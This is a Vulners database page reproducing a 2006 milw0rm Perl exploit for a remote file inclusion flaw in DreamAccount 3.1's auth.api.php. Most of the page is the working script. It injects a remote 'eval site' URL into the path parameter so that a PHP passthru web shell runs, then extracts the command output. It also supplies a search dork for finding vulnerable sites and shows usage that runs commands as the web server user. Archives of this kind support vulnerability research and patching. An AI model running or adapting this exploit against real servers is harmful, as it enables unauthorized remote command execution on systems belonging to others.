Vulners
Lucene search
DreamAccount 3.1 - 'auth.api.php' Remote File Inclusion
#!/usr/bin/perl
use HTTP::Request;
use LWP::UserAgent;
# ----------------------------------------------------
# DREAMACCOUNT V3.1 Remote Command Execution Exploit
# ----------------------------------------------------
# Discovered By CrAsh_oVeR_rIdE(Arabian Security Team)
# Coded By Drago84(Exclusive Security Team)
# ----------------------------------------------------
# site of script:http://dreamcost.com
# ----------------------------------------------------
# Vulnerable: DREAMACCOUNT V3.1
# ----------------------------------------------------
# vulnerable file :
# ------------------
# auth.api.php
# ----------------------------------------------------
# vulnerable code:
# ----------------------------------------------------
# require_once($path . 'mod_htaccess.inc.php'); // 0
# require_once($path . 'mod_pmachine.inc.php'); // 4
# require_once($path . 'mod_vbulletin.inc.php'); // 5
# require_once($path . 'mod_phpbb.inc.php'); // 6
# require_once($path . 'mod_postnuke.inc.php'); // 7
# require_once($path . 'mod_phpnuke.inc.php'); // 8
# require_once($path . 'mod_freeradius.inc.php'); // 9
# require_once($path . 'mod_ldap.inc.php'); // 10
# require_once($path . 'mod_invboard.inc.php'); // 11
# require_once($path . 'mod_yabbse.inc.php'); // 12
# require_once($path . 'mod_mambo.inc.php'); // 13
# require_once($path . 'mod_xaraya.inc.php'); // 14
# require_once($path . 'mod_geeklog.inc.php'); // 15
#
# $path parameter File inclusion
# ----------------------------------------------------
# Exploit:
# ---------
print "\n=============================================================================\r\n";
print " * Dreamaccount Remote Command Execution 23/06/06 *\r\n";
print "=============================================================================\r\n";
print "[*] dork:\"powered by DreamAccount 3.1\"\n";
print "[*] Coded By : Drago84 \n";
print "[*] Discovered by CrAsH_oVeR_rIdE\n";
print "[*] Use <site> <dir_Dream> <eval site> <cmd>\n";
print " Into the Eval Site it must be:\n\n";
print " Exclusive <?php passthru($_GET[cmd]); ?> /Exclusive";
if (@ARGV < 4)
{
print "\n\n[*] usage: perl dream.pl <site> <dir dream> <eval site> <cmd>\n";
print "[*] usage: perl dream.pl www.HosT.com /dreamaccount/ http://www.site.org/doc.jpg id\n";
print "[*] uid=90(nobody) gid=90(nobody) egid=90(nobody) \n";
exit();
}
my $dir=$ARGV[1];
my $host=$ARGV[0];
my $eval=$ARGV[2];
my $cmd=$ARGV[3];
my $url2=$host.$dir."auth.api.php?path=".$eval."?&cmd=".$cmd;
print "\n";
my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);
if ($response->is_success) {
print "\n\nResult of:".$cmd."\n";
my ($pezzo_utile) = ( $response->content =~ m{Exclusive(.+)\/Exclusive}smx );
printf $1;
$response->content;
print "\n";
}
# ----------------------------------------------------------------------------------------------------
# Discovered By CrAsh_oVeR_rIdE
# Coded By Drago84
# E-mail:[email protected]
# Site:www.lezr.com
# Greetz:KING-HACKER,YOUNG_HACKER,SIMO,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,Black-Code,ALMOKAN3,Mr.hcR AND ALL LEZR.COM Member
# milw0rm.com [2006-06-25]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jun 2006 00:00Current
7.4High risk
Vulners AI Score7.4